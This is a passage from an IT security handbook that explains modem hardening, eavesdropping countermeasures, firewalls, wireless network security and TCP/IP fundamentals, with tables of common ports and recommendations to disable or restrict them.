was patented by Hayes, and many modem vendors chose not to license the patent.) If your modem's escape sequence is not disabled, consult your modem documentation or contact your modem vendor to determine how to disable the sequence. This step may require you to add some additional initialization sequence to the modem software or to set some configuration switches. · Verify that your modems lock out concurrent access properly. Be sure that there is no way for one user to access a modem that is currently in use by another user. If the terminal program does not exit when the telephone is disconnected, or if it is possible to return the modem to programming mode by sending an escape sequence, a user may be able to make telephone calls that are not logged. A user might even be able to reprogram the modem, causing it to call a specific phone number automatically, no matter what phone number it was instructed to call. At the other end, a Trojan horse might be waiting for your users. If the modem does not hang up the phone when the program exits, it can result in abnormally high telephone bills. Perhaps more importantly, your user might remain logged into the remote machine. The next person who uses the program might gain access to that first user's account on the remote computer. Answer testing PART To test your computer's answering ability, you need another computer or terminal with a second modem to call your FIVE computer. Test as follows: 1. Call your computer. It should answer the phone on the first few rings and offer a login banner. If your modem is set to cycle among various baud rates, you may need to press the BREAK or linefeed key on your terminal a few 294 IT SECURITY FOR TECHNICAL ADMINISTRATORS times to synchronize the answering modem's baud rate with the one that you are using. You should not press BREAK if you are using a modem that automatically selects baud rate. 2. Log in as usual. Then log out. Your computer should hang up the phone. 3. Call your computer and log in a second time. This time, hang up the telephone by pulling the telephone line out of the originating modem. This action simulates having the phone connection accidentally broken. Call your computer back on the same telephone number. You should get a new banner. You should not be reconnected to your old shell or session; that shell should have had its process destroyed when the connection was broken. The system must automatically log you out when the telephone connection is broken. Otherwise, if the telephone is accidentally hung up and somebody else calls your computer, that person will be able to type commands as if he were a legitimate user, without ever having to log in or enter a password. 4. If you have several modems connected to a hunt group (a pool of modems where the first non-busy one answers, and all calls are made to a single number), make sure that the group hunts properly. Many don't--which results in callers getting busy signals even when there are modems available. Some stop hunting if they connect to a failed modem, rendering the rest of the group inaccessible. Protecting Against Eavesdropping Modems are susceptible to eavesdropping and wiretapping. Older modems, including data modems that are slower than 9600 baud and most fax modems, can be readily wiretapped using off-the-shelf hardware. Higher-speed modems can be eavesdropped upon using moderately sophisticated equipment that, while less readily available, can still be had for, at most, thousands of dollars. Kinds of eavesdropping There are basically six different places where a telephone conversation over a modem can be tapped. At your premises, an attacker can place a second modem or tape recorder in parallel with your existing instruments. Outside your window, it's possible to determine the information being sent over modems by analyzing the flashing of their transmit data and receive data lights. Between your premises and the telephone company central office, wires can be spliced. At the telephone company switch, a programmer can install an undetectable tap on a computer switch, or splice the line on a manual switch. If the call is routed over a satellite or microwave link, the radio transmission can be decoded. Finally, at the call's destination, a wiretap can be installed. Eavesdropping countermeasures There are several measures that you can take against electronic eavesdropping, with varying degrees of effectiveness: Visually inspect your telephone line Look for spliced wires, taps, or boxes that you cannot understand. Most eavesdropping by people who are not professionals is easy to detect. Have your telephone line electronically "swept" Using a device called a signal reflectometer, a trained technician can electronically detect any splices or junctions on your telephone line. Junctions may or may not be evidence of taps; in some areas, many telephone pairs have multiple arms that take them into several different neighborhoods. If you do choose to sweep your line, you should do so on a regular basis. Detecting a change in a telephone line that has been watched over time is easier than looking at a line one time only and determining if the line has a tap on it. Sweeping may not detect certain kinds of taps, such as digital taps conducted by the telephone company for law enforcement agencies or other organizations, nor will it detect inductive taps. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 295 Use cryptography The best way to protect your communications from eavesdropping is to assume that your communications equipment is already compromised and to encrypt all the information as a preventative measure. If you use a dialup connection to the Internet, you can use cryptographic protocols such as SSL and SSH to form a crypto-graphic barrier that extends from your computer system to the remote server. VPN systems such as point-to-point tunneling protocol (PPTP) and IPsec can also be used to encrypt all communications between your computer and a remote server. A few years ago, cryptographic telephones or modems cost more than $1,000 and were only available to certain purchasers. Today, there are devices costing less than $300 that fit between a computer and a modem and create a cryptographically secure line. Most of these systems are based on private key cryptography and require that the system operator distribute a different key to each user. In practice, such restrictions pose no problem for most organizations. But there are also a growing number of public key systems that offer simple-to-use security that's still of the highest caliber. There are also many affordable modems that include built-in encryption and that require no special unit to work. Preventing Unauthorized Modems with Telephone Scanning and Telephone Firewalls Many organizations have policies that forbid the installation and operation of modems without specific permission from the site security manager. Each authorized modem is then audited on a regular basis to assure that it is correctly configured and that it complies with the site's policies regarding banners, usernames, passwords, and so forth. Because it is so easy to install a modem, many organizations have modems of which they are unaware. There are two ways to deal with the threat of these so-called rogue modems: telephone scanning and telephone firewalls. Telephone scanning You can use a program called a telephone scanner to locate unknown and unauthorized modems. A telephone scanner systematically calls every telephone number in a pre-defined range and notes the banners of the systems that answer. Some telephone scanners can be programmed to attempt to break into the computer systems that they find by using a predetermined list of usernames and passwords. There are both free and commercial telephone scanners available with a wide range of options. Additionally, some computer consulting firms will perform telephone scanning as part of a security audit. Telephone firewalls In some situations, the risk of penetration by modem is so high that simply scanning for unauthorized modems is not sufficient. In these situations, you may wish to use a telephone firewall to mediate telephone calls between your organization and the outside world. Similar to an Internet firewall, a telephone firewall is a device that is placed between your telephone system and an outside communications circuit. Typically, a telephone firewall is equipped with multiple ports for digital T1 telephone lines: instead of plugging a PBX into a T1 from a telephone company, the PBX is plugged into the telephone firewall, and the firewall is plugged into the exterior T1s. PART A telephone firewall analyzes the content of every telephone conversation. If it detects modem tones originating or FIVE terminating at an extension that is not authorized to operate a modem, the call is terminated and the event is logged. Telephone firewalls can also be used to control fax machines, incoming phone calls, and even unauthorized use of long-distance calls and the use of 800 numbers and 900 services. 296 IT SECURITY FOR TECHNICAL ADMINISTRATORS Limitations of scanning and firewalls It is important to realize that neither telephone scanning nor telephone firewalls can do more than detect or control modems that use telephone lines that you know about. Suppose that your organization has a specific telephone exchange: in all likelihood, you will confine your telephone scanning and telephone firewall to that exchange. If some worker orders a separate telephone line from the phone company and pays for that line with his own funds, that phone number will not be within your organization's telephone exchange and will, therefore, not be detected by telephone scanning. Nor will it be subject to a telephone firewall. A cell phone connected to a modem is also not going to be within your defined exchange. In many cases, the only way to find rogue telephone lines is through a detailed physical inspection of wiring closets and other points where external telephone lines can enter an organization. In an environment that is rich with authorized wireless devices, it can be even harder to find unauthorized wireless devices. Networks Although telephone modems are still widely used to connect computers, millions of computers are connected to one another through higher-speed networks. From a practical viewpoint, computer users today usually divide the world of networking into two halves: Local area networks LANs are high-speed networks used to connect computers at a single location. Although the original Ethernet network was a broadcast network that sent high-frequency transmissions over a coaxial cable, today the term Ethernet is widely taken to refer to a twisted-pair network assembled with hubs or switches that can transmit information at speeds of 10, 100, or 1,000 Mbps. Wireless networks that operate over a relatively short range-- within an office or home--also constitute "local area networks." The protocols involved in either case are defined in standards developed by the Institute of Electrical and Electronics Engineers (IEEE). Two computers can also be directly connected to each other with a serial line. IP packets are then sent using PPP (Point-to-Point Protocol), SLIP (Serial Line Internet Protocol), or CSLIP (Compressed SLIP). If each computer is, in turn, connected to a local area network, the serial line can bridge together the two LANs. Wide area networks WANs are typically slower-speed networks that organizations use to connect their LANs. WANs are often built from leased telephone lines and long-distance data circuits (which may transit satellite links, microwave connections, and fiber optic cables) capable of moving data at speeds between 56 Kbps and gigabits per second. A WAN might bridge a company's offices on either side of a town or on either side of a continent. Some WANs are shared by several organizations. A special kind of WAN link that's become increasingly popular is the Virtual Private Network (VPN). The VPN is a virtual network because the packets travel over the Internet (or some other public network); it's a private network because the data in the packets is encrypted to prevent anyone on the public network from reading it or tampering with it. A VPN can connect multiple locations much more cheaply than leasing lines between them. One of the first computer networks was the ARPANET, developed in the early 1970s by universities and corporations working under contract to the U.S. Department of Defense's Advanced Research Projects Agency (ARPA or DARPA). The ARPANET linked computers around the world and served as a backbone for many other regional and campus- wide networks that sprang up in the 1980s. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 297 Today, the descendant of the ARPANET is known as the Internet. The Internet is an IP-based network that encompasses hundreds of millions of computers and more than a billion users throughout the world. Some of these computer systems are constantly connected, while others are connected only intermittently. Any one of those users can try to send you electronic mail, exchange files with your FTP file server, or break into your system--if your system is configured to allow them the access necessary to do so. Gateways and Routers Despite the complexity of the Internet and IP addressing, computers can easily send each other messages across the global network. To send a packet, most computers simply set the packet's destination address and then send the packet to a computer on their local network called a gateway. If the gateway makes a determination of where to send the packet next, the gateway is a router. The router takes care of sending the packet to its final destination by forwarding the packet to a directly connected gateway that is (supposed to be) one step closer to the destination host. Many organizations configure their internal networks as a large tree. At the root of the tree is the organization's connection to the Internet. When a gateway receives a packet, it decides whether to send it to one of its own subnetworks or direct it towards the root. Out on the Internet, major IP providers have far more complicated networks with sophisticated routing algorithms and specialized routing protocols. Many of these providers have redundant networks so that if one link malfunctions, other links can take over. Small office and home users can easily purchase 4-port and 8-port Ethernet routers that are designed to connect to a broadband DSL or cable modem connection and route packets between the home computers and the broadband modem (and from thence to the Internet). An important feature of these devices (and one that is also supported by high-end routers) is Network Address Translation (NAT). NAT is a general system for translating IP addresses in data packets received by the router to other addresses before (or after) the packet's destination is chosen by the router and the packet is sent out to that destination. It is most commonly used to allow several internal computers with private (nonroutable) IP addresses to share a single external (public) IP address, or to translate public IP addresses for groups of computers into corresponding private IP addresses on an internal network. Because the internal IP addresses cannot be reached directly from the public Internet (because no other routers will be able to correctly route them), NAT schemes provide some protection against outsiders initiating connections to internal machines, while still making it possible for the internal machines to initiate and maintain connections to the Internet. A second feature of high-end routers is the ability to establish a Virtual Private Network (VPN) between two LANs in separate locations (e.g., two branch offices). Pairs of routers create VPNs between them using protocols like IPsec, and then route traffic between the LANs through the VPN rather than over the unprotected Internet. Routers often represent the border of an organization's network security perimeter, as well as a point of vulnerability. If a router is subverted, attackers can redirect packets intended for the organization elsewhere, or gain inappropriate access to internal hosts or network layout information. Each router vendor offers different programming features, which can make securing routers a challenge. A recommended practice is to insure that routers can only be programmed by those with physical access (to a terminal connected by a serial cable, for example), and not through the network. Router configuration menus should always be password-protected, and if routers are to be SNMP-managed, read access to the router should be password-protected and write access disabled. PART Borders routers should be equipped with egress filters so that they will not send packets out of a network unless the FIVE packet has a valid source IP address located within the network. They should also be configured with ingress filters to insure that packets claiming to be from within the network will not be accepted on the router's external interface and routed into the network. 298 IT SECURITY FOR TECHNICAL ADMINISTRATORS External Firewalls A firewall is a device that is designed to prevent traffic from flowing between two networks, with the exception of traffic passing through designated "holes" in the firewall. Firewalls are typically divided into two types: packet filters and application gateways. Packet-filtering firewalls intercept and analyze network data packets and determine if they should be allowed to pass through the firewall or not. Traditional packet-filtering firewalls are relatively simple-minded. They can allow, deny, or otherwise mangle packets using the information contained in the packet's headers, such as source and destination addresses and ports, and packet flags like SYN. Packet filters that perform stateful inspection keep track of the state of each connection passing through the firewall and may examine the contents of each packet in greater detail in order to determine whether they "belong" to a particular connection. For example, a stateful firewall can identify an FTP data transfer connection, determine that it is associated with an existing FTP control connection, and allow it, while disallowing a new inbound connection on the same port. An application gateway operates at the application level of the network, rather than the packet level, and is typically built of several proxies for application services to be provided. Rather than connect to the organization's web server itself, outsiders might connect to the firewall's web server proxy operating on port 80. The proxy software insures that the connection is appropriate, may validate the data stream, and then passes it on to the actual internal web server; the proxy is similarly responsible for relaying the outbound data from the web server back to the client. Some policies that an external firewall might be used to implement include: · Disallow all incoming traffic by default, but permit a few exceptions, such as allowing anyone to make an HTTP connection to port 80, and a list of predefined hosts to make an SSH connection to port 22. This "deny everything that isn't permitted" approach is a recommended security practice. · Allow outgoing HTTP connections to anywhere on the Internet, but only allow incoming connections to a few select hosts. · Log firewall violations for later analysis. Several (very good) books on firewalls are available that discuss their design and deployment in depth, including how to organize multiple firewalls to partition the network into a subnetwork of hosts that outsiders can access (often called the "demilitarized zone") and a subnetwork of hosts that are protected from outsiders. Especially recommended are Cheswick, Bellovin, and Rubin's 2003 book Firewalls and Internet Security: Repelling the Wily Hacker, Second Edition, and Zwicky, Cooper, and Chapman's 2000 book Building Internet Firewalls, Second Edition. Host-Based Firewalls Many systems, including most Unix systems and recent Microsoft systems, contain a built-in packet filter. Some, like Linux 2.4's netfilter component, provide stateful inspection of packets as well. The firewall is controlled with rules that are loaded into the kernel at runtime. Rules can block or allow packets to flow based on packet type, host, protocol, and even packet-level flags. Guidelines for configuration of host-based packet filters are largely the same as those for external firewalls. The rules that you add to the kernel with a packet-level firewall are in addition to any access control rules that you might implement within network applications, with the tcpwrapper system (discussed below),or with any external firewall that may be protecting the network that the host is on. The kernel-level firewall can give you an additional layer of protection and is an important part of a defense-in-depth strategy. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 299 The primary disadvantage of packet-level firewalls is that they consume some CPU power; this can be a special concern on systems that are heavily loaded and in cases where the rule sets are very long -- the added CPU requirements may be more than your system can handle! For most situations, however, packet-level firewalls do not place an excessive burden on the system. For example, an Intel-based 486 running at 33Mhz with a free Unix kernel can easily handle the traffic of a fully-loaded T1 or DSL line. Most host-based firewalls allow you to configure rules that will apply to incoming packets destined for the host, outgoing packets leaving the host, or packets being forwarded by a host that is serving as a gateway. Filtering incoming packets is an important way to restrict access to network services. Filtering outgoing packets can limit accidental exposure of important system resources and configuration information, and can reduce the damage that can be done if the machine should be compromised by a Trojan. It can also help enforce policies on acceptable network use, but sufficiently knowledgeable users can often tunnel connections through outbound filters. One of the more interesting developments in host-based firewalls is on-demand filtering. If you're not running several services because of known vulnerabilities, you might instead run a monitor that listens on the unused ports ­ or even on every unused port below 1024. If a remote host tries to connect to your host for NNTP when you're not a news server, or to use the TFTP service, the monitor takes action: logging the attempt, adding the remote host's IP address to a tcpwrapper deny rule, or adding a host-based firewall rule to block the remote host from any connections. If you're concerned about accidentally blocking an innocent host, the monitor might be configured to require multiple probes before firewalling the remote host. Several free and commercial scan-detection monitors are available for different platforms. Wireless Networking An increasingly prevalent networking strategy, particularly in locations where adding network infrastructure would be costly or infeasible, is wireless networking. Wireless networks generally follow the IEEE 802.11 standards, which include 802.11b, 802.11a, and 802.11g239. In a typical wireless network, devices called wireless access points are installed to receive and transmit data within a given area (e.g. one floor of a building). Access points may be bridged to one another, but eventually must connect to the organization's (wired) router if packets are to be routed outside of the organization. There are several important security considerations in setting up a wireless network. Data on the network should be private ­ it should be infeasible for an attacker to eavesdrop. Moreover, it should be infeasible for an attacker to join the wireless network and take advantage of its resources (such as Internet connectivity). Unfortunately, wireless networking does not have a good security record. In particular, most 802.11b networks offer little protection. Although a protocol for link-level encryption called WEP (wired equivalent protocol) is widely used, WEP has been demonstrated to be fundamentally flawed, and attackers with relatively simple hardware (a laptop and a wireless card) can capture enough data packets to divulge the encryption key and render all of the data visible. The most popular access control approaches, such as MAC filtering (only allowing wireless clients with known hardware addresses to connect), are also relatively weak, as MACs are easy to determine and can be changed. Although it's a good idea to enable all of these security features, as well as changing default SSIDs and turning off SSID broadcast, they do not add up to a secure wireless network. PART On older 802.11b networks, confidentiality can generally be achieved only by requiring clients to use additional FIVE end-to-end encryption (such as SSH or VPN systems) for their connections. Access control can be managed through use of a captive portal. In this system, a firewall (ideally, operating on each access point), blocks all 239Other wireless devices, like cell phones and PDAs, may use GSM cellular networks instead. Many of the problems that plague 802.11 networks are also prevalent in GSM networks; for more information, see "Mobile Risk Management: E-Finance in the Wireless Environment (2002), by Tom Kellermann for The World Bank: www.worldbank1.org/finance 300 IT SECURITY FOR TECHNICAL ADMINISTRATORS unauthenticated traffic except traffic directed to the portal application, which is responsible for (securely) authenticating the user, and directing the firewall to allow packets from the authenticated machine to be routed for a limited time. For example, the portal application might run on an SSL-protected web and RADIUS server connected by Ethernet to the access point. A more secure approach is outlined in the IEEE 802.1x standard. Wireless devices that support this standard use the Extensible Authentication Protocol (EAP) to exchange authentication data. Wireless clients start out in an unauthenticated mode in which they can only send the initial EAP packet. The access point responds with an EAP request for the client's identity, which the client transmits. This conversation occurs over a secure channel, most commonly implemented via a variation of TLS. The access point authenticates the identity and changes the client's mode to authenticated. It transmits an initial WEP key to be used to encrypt the wireless data, and can change keys during the connection; by changing keys frequently, attacks against WEP that rely on capturing many packets with the same key are prevented. A new specification, Wi-Fi Protected AccessTM (WPA), offers an improved encryption system in place of WEP, and the ability to perform authentication either through 802.1x or by use of a shared key. The latter mode is primarily intended for home or small office users who cannot set up their own RADIUS servers for 802.1x authentication. Like wired networks, wireless networks can also benefit from appropriate configuration of packet filters on access points, appropriate location of access points in the network topology (ideally, outside the internal firewall), and similar approaches to hardening network security. Running a network intrusion detection system on the wireless network is also a good practice. Finally, note that wireless networks are susceptible to jamming. For example, a leaky microwave oven can effectively disrupt a wireless network based on the Wi-Fi (802.11) technology, as both microwave ovens and Wi-Fi systems use the same band of the 2.4Ghz spectrum. Although jamming may not lead to information disclosure, it can effectively make a wireless network unusable. Two useful books for building secure wireless networks are 802.11 Security and RADIUS, both published by O'Reilly and Associates. TCP/IP Networking The Internet Protocol (IP) is the glue that holds together modern computer networks. IP specifies the way that messages are sent from computer to computer; it essentially defines a common "language" that is spoken by every computer stationed on the Internet. IPv4, the fourth version of the Internet Protocol, has been used on the Internet since 1982. IPv4 is universally used today, and will likely see continued use for many years to come. IPv5 was an experimental protocol that was never widely used. IPv6 is the newest version of the Internet Protocol. IPv6 provides for a dramatically expanded address space, built-in encryption, and plug-and-play Internet connectivity. As of 2003, IPv6 is largely being used on an experimental basis, although use of this new Internet Protocol is slowly increasing. On the Internet, data is sent in blocks of characters called datagrams, or more colloquially, packets. Each packet has a small block of bytes called the header, which identifies the sender and intended destination on each computer. The header is followed by another, usually larger, block of characters of data called the packet's contents. After the packets reach their destination, they are often reassembled into a continuous stream of data; this fragmentation and reassembly process is usually invisible to the user. As there are often many different routes from one system to Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 301 another, each packet may take a slightly different path from source to destination. Because the Internet switches packets, instead of circuits, it is called a packet-switching network. The IP packets can themselves be encapsulated within packets used by other network protocols. Today, many IP networks built from "leased lines" actually send IP packets encapsulated within Frame Relay or ATM (Asynchronous Transfer Mode) networks. IP addressing Every interface that a computer has on an IPv4 network is assigned a unique 32-bit address. These addresses are often expressed as a set of four 8-bit numbers called octets. A sample address is 18.70.0.224. A computer can have multiple network interfaces, each with a different address, and potentially with each on a different LAN or serial line. Theoretically, the 32-bit IP address allows a maximum of 232 = 4,294,967,296 computers to be attached to the Internet at a given time. In practice, the total number of computers that can be connected is much more than 232 because it is possible for many computers to share a single IP address through the use of technologies such as proxies and Network Address Translation. These multiple systems behind the single IP address can be configured with a variety of policies to govern connectivity between machines, allowing no access, restricted access, or unlimited access in either or both directions. IP networks The Internet is a network of networks. Although many people think of these networks as being major networks, such as those belonging to companies like AT&T, WorldCom, and Sprint, most of the networks that make up the Internet are actually local area networks, such as the network in an office building or the network in a small research laboratory. Each of these small networks is given its own network number. There are two methods of looking at network numbers. The "classical" network numbers were distinguished by a unique prefix of bits in the address of each host in the network. This approach partitioned the address space into a well-defined set of differently sized networks. There are five primary kinds of IP addresses in the "classical" address scheme; the first few bits of the address (the most significant bits) define the class of network to which the address belongs. The remaining bits are divided into a network part and a host part: Class A addresses Hosts on Class A networks have addresses in the form N.a.b.c, in which N is the network number and a.b.c is the host number; the most significant bit of N must be 0. There are not many Class A networks, as they are quite wasteful; unless your network has 16,777,216 separate hosts, you don't need a Class A network. Nevertheless, many early pioneers of the Internet, such as MIT and Bolt Beranek and Newman (BBN), were assigned Class A networks. Of course, these organizations don't really put all of their computers on the same physical network. Instead, most of them divide their internal networks as (effectively) Class B or Class C networks. This approach is known as subnetting. PART Class B addresses Hosts on Class B networks have addresses in the form N.M.a.b, in which N.M is the network number and a.b is the FIVE host number; the most significant two bits of N must be 10. Class B networks are commonly found at large universities and major commercial organizations. 302 IT SECURITY FOR TECHNICAL ADMINISTRATORS Class C addresses Hosts on Class C networks have addresses in the form N.M.O.a, in which N.M.O is the network number, and a is the host number; the most significant three bits of N must be 110. These networks can only accommodate a maximum of 254 hosts. (Flaws and incompatibilities between various IP implementations make it unwise to assign IP addresses ending in either 0 or 255.) Most organizations have one or more Class C networks. Class D addresses A Class D address is of the form N.M.O.a, in which the most significant four bits of N are 1110. These addresses are not actually of networks, but of multicast groups, which are sets of hosts that listen on a common address to receive broadcasts. Class E addresses A Class E address is of the form N.M.O.P, in which the most significant four bits of N are 1111. These addresses are currently reserved for experimental use. Several of these network classes had large "holes" ­ sets of host addresses that were never used. With the explosion of sites on the Internet, a somewhat different interpretation of network addresses has been proposed, which allows more granularity in the assignment of network addresses and less waste. This approach is the Classless InterDomain Routing (CIDR) scheme. As the name implies, there are no "classes" of addresses as in the classical scheme. Instead, networks are defined as being the most significant k bits of each address, with the remaining 32-k bits being used for the host part of the address. Thus, a service provider could be given a range of addresses whereby the first 14 bits of the address are fixed at a particular value (the network address), and the remaining 18 bits represent the portion of the address available to allocate to hosts. This method allows the service provider to allocate up to 218 distinct addresses to customers. CIDR networks are often abbreviated as the lowest IP address in the range, followed by a slash and the size, in bits, of the network portion. For example, the network 128.200.0.0/14 represents all of the IP addresses from 128.200.0.0 to 128.203.255.255. Another way that this network is often abbreviated is with the lowest IP address in the range, followed by a slash and the netmask, which is the dotted octet in which the k most significant bits are 1s and all others are 0s. In our example, this abbreviation would be 128.200.0.0/255.252.0.0. The CIDR scheme is compatible with the classical address format, with Class A addresses using an 8-bit network field (e.g., 10.0.0.0/8), Class B networks using a 16-bit network address (e.g., 192.168.0.0/16), and so on. Packets and Protocols Today there are four main kinds of IP packets that are sent on the Internet that will be seen by typical hosts (additional types of packets may be used by routers on major backbones or in VPNs). Each is associated with a particular protocol: ICMP Internet Control Message Protocol. This protocol is used for low-level operation of the IP protocol. There are several subtypes--for example, for the exchange of routing and traffic information. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 303 TCP Transmission Control Protocol. This protocol is used to create a two-way stream connection between two computers. It is a "connected" protocol and includes time-outs and retransmission to ensure reliable delivery of information. UDP User Datagram Protocol. This protocol is used to send packets from host to host. The protocol is "connectionless" and makes a best-effort attempt at delivery. Although the protocol is technically unreliable because it does not guarantee that information sent will be delivered, in practice most UDP packets reach their destination under normal operating circumstances. IGMP Internet Group Management Protocol. This protocol is used to control multicasting, which is the process of purposely directing a packet to more than one host. Multicasting is the basis of the Internet's multimedia backbone, the MBONE. (Currently, IGMP is not used inside the MBONE, but is used on the edge.) ICMP The Internet Control Message Protocol is used to send messages between gateways and hosts regarding the low- level operation of the Internet. For example, the ping command uses ICMP Echo packets to test for network connectivity; the response to an Echo packet is usually either an ICMP Echo Reply or an ICMP Destination Unreachable message type. In addition to the information in the IP header (packet source and destination addresses), each ICMP packet contains an ICMP header that includes an 8-bit packet type value. Some of the ICMP packet types are no longer used on the Internet, although many of them remain supported in most TCP/IP implementations. This has been an occasional source of security problems. In particular, packet types 3 (destination unreachable), 4 (source quench), and 5 (redirect) present security risks, because an attacker who can craft ICMP packets of these types can redirect network traffic or perform a denial of service. Although the other packet types present less of an immediate risk, different versions of different operating systems often have subtly different responses to these ICMP packets, and attackers can use the pattern of responses to help "fingerprint" the operating system on your system to exploit known bugs. If you use a firewall, you should be sure that many ICMP packet types are blocked or monitored. You can generally safely block incoming ICMP packets of types 5, 13 (timestamp request), 14 (timestamp reply), 17 (address-mask request), and 18 (address-mask reply), and outgoing ICMP packets of types 5, 11 (time exceeded), 12 (parameter problem), 13, 14, 17, and 18. TCP TCP provides a reliable, ordered, two-way transmission stream between two programs that are running on the same or different computers. "Reliable" means that every byte transmitted is guaranteed to reach its destination (or you are notified that the transmission failed), and that each byte arrives in the order in which it was sent. Of course, if the connection is physically broken, bytes that have not been transmitted will not reach their destination unless an alternate route can be found. In such an event, the computer's TCP implementation should send an error message to the PART process that is trying to send or receive characters, rather than give the impression that the link is still operational. FIVE Each TCP connection is attached at each end to a port. Ports are identified by 16-bit numbers. For most TCP protocols the server uses the port number assigned to the service it is providing, and the client's port number is randomly chosen by the client on a per-connection basis. Some well-known port numbers are port 80 for HTTP servers and port 25 for SMTP servers. 304 IT SECURITY FOR TECHNICAL ADMINISTRATORS On the wire, TCP packets are IP packets that include an additional TCP header. This header contains, among other things: · TCP port number of the packet's source. · TCP port number of the packet's destination. · Sequence information, so that the receiver can correctly assemble the information in this TCP packet to its correct point in the TCP stream. · Flow control information, which tells the receiver how many more bytes the originator of the packet can receive. This is called the TCP window. · TCP checksum. At any instant, every IPv4TCP connection on the Internet can be identified by a set of two 32-bit numbers and two 16-bit numbers: · Host address of the connection's originator (from the IP header) · Port number of the connection's originator (from the TCP header) · Host address of the connection's target (from the IP header) · Port number of the connection's target (from the TCP header) The TCP protocol uses two special bits in the packet header, SYN and ACK, to negotiate the creation of new connections. To open a TCP connection, the requesting host sends a packet that has the SYN bit set but does not have the ACK bit set. The receiving host acknowledges the request by sending back a packet that has both the SYN and the ACK bits set. Finally, the originating host sends a third packet, again with the ACK bit set, but this time with the SYN bit unset. This process is called the TCP "three-way handshake." By looking for packets that have theSYN bit set and the ACK bit unset, one can distinguish packets requesting new connections from those that are sent in response to connections that have already been created. This distinction is useful when constructing packet filtering-firewalls. TCP is used for most Internet services that require the sustained synchronous transmission of a stream of data in one or two directions. For example, TCP is used for the hypertext transfer protocol (HTTP), remote terminal service, file transfer, and electronic mail. TCP is also used for sending commands to displays using the X Window system. Table 5A identifies some common TCP services. Significant security problems of exploitable weaknesses have been found in the majority of them, as indicated in the notes. Security concerns: a) Service can be remotely exploited to create a denial-of-service attack. b) Protocol requires that a password be transmitted in cleartext across the Internet without the use of any encryption (under IPv4). c) Improper configuration of SMTP servers, CGI scripts, and proxies is a leading contributor to the relaying of unwanted junk e-mail on the Internet. d) Service is commonly configured for authentication using IP addresses. This is subject to spoofing and other kinds of attacks. UDP The User Datagram Protocol provides a simple, unreliable system for sending packets of data between two or more programs running on the same or different computers. "Uunreliable" means that the operating system does not guarantee that every packet sent will be delivered, or that packets will be delivered in order. UDP does make a best effort to deliver the packets, however. On a LAN or uncrowded Internet path, UDP often approaches 100% reliability. UDP's advantage is that it has less overhead than TCP--less overhead lets UDP-based services transmit information Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 305 Table 5A. Some common TCP services and ports TCP port Service name Function Security concerns Recommendation 7 echo Echoes characters (for testing) a Disable 9 discard Discards characters (for testing) 13 daytime Time of day a Disable 19 chargen Character generator a Disable 21 ftp File Transfer Protocol (FTP) b Disable; use http or ssh 22 ssh Secure Shell Highly recommended (virtual terminal and file transfer) 23 telnet Virtual terminal b Disable; use ssh 25 smtp Electronic mail c 37 time Time of day a Disable 42 nameserver TCP nameservice 43 whois NIC whois service 53 domain Domain Name Service (DNS) d 79 finger User information Disable 80 http World Wide Web (WWW) b,c 110 pop3 Post Office Protocol (POP3) b Disable use of plaintext passwords, or use POP over TLS instead 111 sunrpc Sun Microsystems' d Restrict access Remote Procedure Call (RPC) 113 auth Remote username Use a version that returns authentication service encrypted tokens (see below) 119 nntp Network News Transfer b, d Restrict access Protocol (NNTP) (Usenet) 143 imap Interactive Mail Access Protocol b Disable use of plaintext passwords, or use IMAP over TLS instead 443 https SSL-encrypted HTTP 512 exec Executes commands on a Disable remote Unix host 513 login Logs in to a remote Unix b, d Disable host ( rlogin ) 514 shell Retrieves a shell on a b, d Disable remote Unix host ( rsh ) 515 printer Remote printing d Restrict access 1080 socks SOCKS application proxy service c Restrict access 2049 NFS NFS over TCP d Restrict access 6000-6010 X X Window system b, d Restrict access, PART tunnel through SSH FIVE with as much as 10 times the throughput. UDP is used primarily for Sun's NetworkInformation System (NIS) and Network Filesystem (NFS), for resolving hostnames, and for transmitting routing information. It is also used for services that aren't affected negatively if they miss an occasional packet because they will get another periodic update later, or because the information isn't really that important. 306 IT SECURITY FOR TECHNICAL ADMINISTRATORS As with TCP, UDP packets are also sent from a port on the sending host to another port on the receiving host. Each UDP packet also contains user data. If a program is listening to the particular port and is ready for the packet, it will be received. If no program is listening, the packet will be ignored, and the receiving host will return an ICMP error message. If a program is listening but is not prepared to receive the packet, it may simply be queued and eventually received, or simply lost. In contrast to TCP packets, UDP packets can be broadcast, which causes them to be sent to the same port on every host that resides on the same local area network. Broadcast packets are used frequently for services such as time of day. Ports are identified by 16-bit numbers. Table 5B lists some common UDP ports. Table 5B. Some common UDP services and ports UDP port Service name Function Security concerns Recommendation 7 echo Returns the user's data in a Disable another datagram 9 discard Does nothing 13 daytime Returns time of day a Disable 19 chargen Character Generator a Disable 37 time Returns time of day a Disable 53 domain Domain Name Service (DNS) c Restrict access except on public nameservers 67, 68 bootpc, bootps Dynamic Host Configuration Restrict access Protocol (DHCP) 69 tftp Trivial File Transfer c Disable Protocol (TFTP) 111 sunrpc Sun Microsystems' Remote c Restrict access Procedure Call (RPC) portmapper 137-139, 445 Smb Microsoft networking and Restrict access file sharing 123 ntp Network Time Protocol (NTP) Restrict access 161 snmp Simple Network Management b, c Disable or restrict access Protocol (SNMP) 513 who Collects broadcast messages about who is logged into other machines on the subnet 514 syslog System-logging facility a Restrict access 517 talk Initiates a talk request 518 ntalk The "new" talk request 520 route Routing Information c Disable (use static routing) Protocol (RIP) or restrict access 533 netwall Write on every user's terminal a Disable 2049 NFS (usually) Network Filesystem (NFS) c Restrict access Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 307 Security concerns: a) Service can be remotely exploited to create a denial-of-service attack. b) Protocol requires that a password be transmitted in cleartext across the Internet without the use of any encryption. c) Service is commonly configured for authentication using IP addresses. This is subject to spoofing and other kinds of attacks. Clients and Servers The Internet Protocol is based on the client/server model. Programs called clients initiate connections over the network to other programs called servers, which wait for the connections to be made. One example of a client/server pair is the Network Time System. The client program is the program that asks the network server for the time. The server program is the program that listens for these requests and transmits the correct time. In Unix parlance, server programs that run in the background and wait for user requests are often known as daemons. In the Microsoft world, they are called services. You can connect to an arbitrary TCP/IP port of a computer using the telnet program. (The telnet program was originally used for logging into remote systems. However, as this requires sending an unencrypted password over the network, such use 